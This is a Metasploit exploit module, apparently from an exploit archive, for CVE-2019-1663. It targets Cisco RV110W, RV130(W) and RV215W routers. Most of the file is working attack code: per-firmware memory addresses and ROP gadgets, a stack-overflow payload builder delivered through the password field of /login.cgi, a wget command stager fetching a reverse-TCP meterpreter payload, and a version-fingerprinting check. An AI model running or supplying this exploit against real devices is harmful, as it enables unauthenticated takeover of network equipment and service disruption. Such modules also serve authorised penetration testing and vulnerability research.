Cisco RV110W / RV130(W) / RV215W Remote Command Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
# linux/armle/meterpreter/bind_tcp -> segfault  
# linux/armle/meterpreter/reverse_tcp -> segfault  
# linux/armle/meterpreter_reverse_http -> works  
# linux/armle/meterpreter_reverse_https -> works  
# linux/armle/meterpreter_reverse_tcp -> works  
# linux/armle/shell/bind_tcp -> segfault  
# linux/armle/shell/reverse_tcp -> segfault  
# linux/armle/shell_bind_tcp -> segfault  
# linux/armle/shell_reverse_tcp -> segfault  
#  
class MetasploitModule < Msf::Exploit::Remote  
Rank = GoodRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
include Msf::Exploit::Deprecated  
  
moved_from 'exploit/linux/http/cisco_rv130_rmi_rce'  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution',  
'Description' => %q{  
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall,  
Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router  
could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.  
  
The vulnerability is due to improper validation of user-supplied data in the web-based management interface.  
An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.  
  
A successful exploit could allow the attacker to execute arbitrary code on the underlying operating  
system of the affected device as a high-privilege user.  
  
RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected.  
RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.  
RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.  
  
Note: successful exploitation may not result in a session, and as such,  
on_new_session will never repair the HTTP server, leading to a denial-of-service condition.  
},  
'Author' =>  
[  
'Yu Zhang', # Initial discovery (GeekPwn conference)  
'Haoliang Lu', # Initial discovery (GeekPwn conference)  
'T. Shiomitsu', # Initial discovery (Pen Test Partners)  
'Quentin Kaiser <[email protected]>' # Vulnerability analysis & exploit dev  
],  
'License' => MSF_LICENSE,  
'Platform' => %w[linux],  
'Arch' => [ARCH_ARMLE, ARCH_MIPSLE],  
'SessionTypes' => %w[meterpreter],  
'CmdStagerFlavor' => %w{ wget },  
'Privileged' => true, # BusyBox  
'References' =>  
[  
['CVE', '2019-1663'],  
['BID', '107185'],  
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],  
['URL', 'https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/']  
],  
'DefaultOptions' => {  
'WfsDelay' => 10,  
'SSL' => true,  
'RPORT' => 443,  
'CMDSTAGER::FLAVOR' => 'wget',  
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',  
},  
'Targets' =>  
[  
[ 'Cisco RV110W 1.1.0.9',  
{  
'offset' => 69,  
'libc_base_addr' => 0x2af06000,  
'libcrypto_base_addr' => 0x2ac01000,  
'system_offset' => 0x00050d40,  
'got_offset' => 0x0009d560,  
# gadget 1 is in /usr/lib/libcrypto.so  
'gadget1' => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;  
'Arch' => ARCH_MIPSLE,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',  
}  
}  
],  
[ 'Cisco RV110W 1.2.0.9',  
{  
'offset' => 69,  
'libc_base_addr' => 0x2af08000,  
'libcrypto_base_addr' => 0x2ac03000,  
'system_offset' => 0x0004c7e0,  
'got_offset' => 0x00098db0,  
# gadget 1 is in /usr/lib/libcrypto.so  
'gadget1' => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;  
'Arch' => ARCH_MIPSLE,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',  
}  
}  
],  
[ 'Cisco RV110W 1.2.0.10',  
{  
'offset' => 69,  
'libc_base_addr' => 0x2af09000,  
'libcrypto_base_addr' => 0x2ac04000,  
'system_offset' => 0x0004c7e0,  
'got_offset' => 0x00098db0,  
# gadget 1 is in /usr/lib/libcrypto.so  
'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;  
'Arch' => ARCH_MIPSLE,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',  
}  
}  
],  
[ 'Cisco RV110W 1.2.1.4',  
{  
'offset' => 69,  
'libc_base_addr' => 0x2af54000,  
'libcrypto_base_addr' => 0x2ac4f000,  
'system_offset' => 0x0004c7e0,  
'got_offset' => 0x00098db0,  
# gadget 1 is in /usr/lib/libcrypto.so  
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;  
'Arch' => ARCH_MIPSLE,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',  
}  
}  
],  
[ 'Cisco RV110W 1.2.1.7',  
{  
'offset' => 69,  
'libc_base_addr' => 0x2af98000,  
'libcrypto_base_addr' => 0x2ac4f000,  
'system_offset' => 0x0004c7e0,  
'got_offset' => 0x00098db0,  
# gadget 1 is in /usr/lib/libcrypto.so  
'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;  
'Arch' => ARCH_MIPSLE,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',  
}  
}  
],  
[ 'Cisco RV130/RV130W < 1.0.3.45',  
{  
'offset' => 446,  
'libc_base_addr' => 0x357fb000,  
'system_offset' => 0x0004d144,  
'gadget1' => 0x00020e79, # pop {r2, r6, pc};  
'gadget2' => 0x00041308, # mov r0, sp; blx r2;  
'Arch' => ARCH_ARMLE,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',  
}  
},  
],  
[ 'Cisco RV215W 1.1.0.5',  
{  
'offset' => 69,  
'libc_base_addr' => 0x2af59000,  
'libcrypto_base_addr' => 0x2ac54000,  
'system_offset' => 0x0004c7e0,  
'got_offset' => 0x00098db0,  
# gadget 1 is in /usr/lib/libcrypto.so  
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;  
'Arch' => ARCH_MIPSLE,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',  
}  
}  
],  
[ 'Cisco RV215W 1.1.0.6',  
{  
'offset' => 69,  
'libc_base_addr' => 0x2af59000,  
'libcrypto_base_addr' => 0x2ac54000,  
'system_offset' => 0x0004c7e0,  
'got_offset' => 0x00098db0,  
# gadget 1 is in /usr/lib/libcrypto.so  
'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;  
'Arch' => ARCH_MIPSLE,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',  
}  
}  
],  
[ 'Cisco RV215W 1.2.0.14',  
{  
'offset' => 69,  
'libc_base_addr' => 0x2af5f000,  
'libcrypto_base_addr' => 0x2ac5a001,  
'system_offset' => 0x0004c7e0,  
'got_offset' => 0x00098db0,  
# gadget 1 is in /usr/lib/libcrypto.so  
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;  
'Arch' => ARCH_MIPSLE,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',  
}  
}  
],  
[ 'Cisco RV215W 1.2.0.15',  
{  
'offset' => 69,  
'libc_base_addr' => 0x2af5f000,  
'libcrypto_base_addr' => 0x2ac5a000,  
'system_offset' => 0x0004c7e0,  
'got_offset' => 0x00098db0,  
# gadget 1 is in /usr/lib/libcrypto.so  
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;  
'Arch' => ARCH_MIPSLE,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',  
}  
}  
],  
[ 'Cisco RV215W 1.3.0.7',  
{  
'offset' => 77,  
'libc_base_addr' => 0x2afeb000,  
'libcrypto_base_addr' => 0x2aca5000,  
'system_offset' => 0x0004c7e0,  
'got_offset' => 0x000a0530,  
# gadget 1 is in /usr/lib/libcrypto.so  
'gadget1' => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;  
'Arch' => ARCH_MIPSLE,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',  
}  
}  
],  
[ 'Cisco RV215W 1.3.0.8',  
{  
'offset' => 77,  
'libc_base_addr' => 0x2afee000,  
'libcrypto_base_addr' => 0x2aca5000,  
'system_offset' => 0x0004c7e0,  
'got_offset' => 0x000a0530,  
# gadget 1 is in /usr/lib/libcrypto.so  
'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;  
'Arch' => ARCH_MIPSLE,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',  
}  
}  
],  
],  
'DisclosureDate' => 'Feb 27 2019',  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [ CRASH_SERVICE_DOWN, ],  
},  
))  
end  
  
def p(lib, offset)  
[(lib + offset).to_s(16)].pack('H*').reverse  
end  
  
def prepare_shellcode(cmd)  
case target  
# RV110W 1.1.0.9, 1.2.0.9, 1.2.0.10, 1.2.1.4, 1.2.1.7  
# RV215W 1.1.0.5, 1.1.0.6, 1.2.0.14, 1.2.0.15, 1.3.0.7, 1.3.0.8  
when targets[0], targets[1], targets[2], targets[3], targets[4], targets[6], targets[7], targets[8], targets[9], targets[10], targets[11]  
shellcode = rand_text_alpha(target['offset']) + # filler  
rand_text_alpha(4) + # $s0  
rand_text_alpha(4) + # $s1  
rand_text_alpha(4) + # $s2  
rand_text_alpha(4) + # $s3  
p(target['libc_base_addr'], target['system_offset']) + # $s4  
rand_text_alpha(4) + # $s5  
rand_text_alpha(4) + # $s6  
rand_text_alpha(4) + # $s7  
rand_text_alpha(4) + # $s8  
p(target['libcrypto_base_addr'], target['gadget1']) + # $ra  
p(target['libc_base_addr'], target['got_offset']) +  
rand_text_alpha(28) +  
cmd  
shellcode  
when targets[5] # RV130/RV130W  
shellcode = rand_text_alpha(target['offset']) + # filler  
p(target['libc_base_addr'], target['gadget1']) +  
p(target['libc_base_addr'], target['system_offset']) + # r2  
rand_text_alpha(4) + # r6  
p(target['libc_base_addr'], target['gadget2']) + # pc  
cmd  
shellcode  
end  
end  
  
def send_request(buffer)  
begin  
send_request_cgi({  
'uri' => '/login.cgi',  
'method' => 'POST',  
'vars_post' => {  
"submit_button": "login",  
"submit_type": "",  
"gui_action": "",  
"wait_time": 0,  
"change_action": "",  
"enc": 1,  
"user": rand_text_alpha_lower(5),  
"pwd": buffer,  
"sel_lang": "EN"  
}  
})  
rescue ::Rex::ConnectionError  
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")  
end  
end  
  
def check  
  
# We fingerprint devices using SHA1 hash of a web resource accessible to unauthenticated users.  
# We use lang_pack/EN.js because it's the one file that changes the most between versions.  
# Note that it's not a smoking gun given that some branches keep the exact same files in /www  
# (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x)  
  
fingerprints = {  
"69d906ddd59eb6755a7b9c4f46ea11cdaa47c706" => {  
"version" => "Cisco RV110W 1.1.0.9",  
"status" =>Exploit::CheckCode::Vulnerable  
},  
"8d3b677d870425198f7fae94d6cfe262551aa8bd" => {  
"version" => "Cisco RV110W 1.2.0.9",  
"status" => Exploit::CheckCode::Vulnerable  
},  
"134ee643ec877641030211193a43cc5e93c96a06" => {  
"version" => "Cisco RV110W 1.2.0.10",  
"status" => Exploit::CheckCode::Vulnerable  
},  
"e3b2ec9d099a3e3468f8437e5247723643ff830e" => {  
"version" => "Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)",  
"status" => Exploit::CheckCode::Unknown  
},  
"6b7b1e8097e8dda26db27a09b8176b9c32b349b3" => {  
"version" => "Cisco RV130/RV130W 1.0.0.21",  
"status" => Exploit::CheckCode::Vulnerable  
},  
"9b1a87b752d11c5ba97dd80d6bae415532615266" => {  
"version" => "Cisco RV130/RV130W 1.0.1.3",  
"status" => Exploit::CheckCode::Vulnerable  
},  
"9b6399842ef69cf94409b65c4c61017c862b9d09" => {  
"version" => "Cisco RV130/RV130W 1.0.2.7",  
"status" => Exploit::CheckCode::Vulnerable  
},  
"8680ec6df4f8937acd3505a4dd36d40cb02c2bd6" => {  
"version" => "Cisco RV130/RV130W 1.0.3.14, 1.0.3.16",  
"status" => Exploit::CheckCode::Vulnerable  
},  
"8c8e05de96810a02344d96588c09b21c491ede2d" => {  
"version" => "Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)",  
"status" => Exploit::CheckCode::Unknown  
},  
"2f29a0dfa78063d643eb17388e27d3f804ff6765" => {  
"version" => "Cisco RV215W 1.1.0.5",  
"status" => Exploit::CheckCode::Vulnerable  
},  
"e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f" => {  
"version" => "Cisco RV215W 1.1.0.6",  
"status" => Exploit::CheckCode::Vulnerable  
},  
"7cc8fcce5949a68c31641c38255e7f6ed31ff4db" => {  
"version" => "Cisco RV215W 1.2.0.14 or 1.2.0.15",  
"status" => Exploit::CheckCode::Vulnerable  
},  
"050d47ea944eaeadaec08945741e8e380f796741" => {  
"version" => "Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)",  
"status" => Exploit::CheckCode::Unknown  
}  
}  
  
uri = target_uri.path  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(uri, 'lang_pack/EN.js')  
})  
if res && res.code == 200  
fingerprint = Digest::SHA1.hexdigest("#{res.body.to_s}")  
if fingerprints.key?(fingerprint)  
print_good("Successfully identified device: #{fingerprints[fingerprint]["version"]}")  
return fingerprints[fingerprint]["status"]  
else  
print_status("Couldn't reliably fingerprint the target.")  
end  
end  
Exploit::CheckCode::Unknown  
end  
  
def exploit  
print_status('Sending request')  
execute_cmdstager  
end  
  
def execute_command(cmd, opts = {})  
shellcode = prepare_shellcode(cmd.to_s)  
send_request(shellcode)  
end  
  
def on_new_session(session)  
# Given there is no process continuation here, the httpd server will stop  
# functioning properly and we need to take care of proper restart  
# ourselves.  
print_status("Reloading httpd service")  
reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"  
if session.type.to_s.eql? 'meterpreter'  
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'  
session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""  
else  
session.shell_command(reload_httpd_service)  
end  
ensure  
super  
end  
end  
`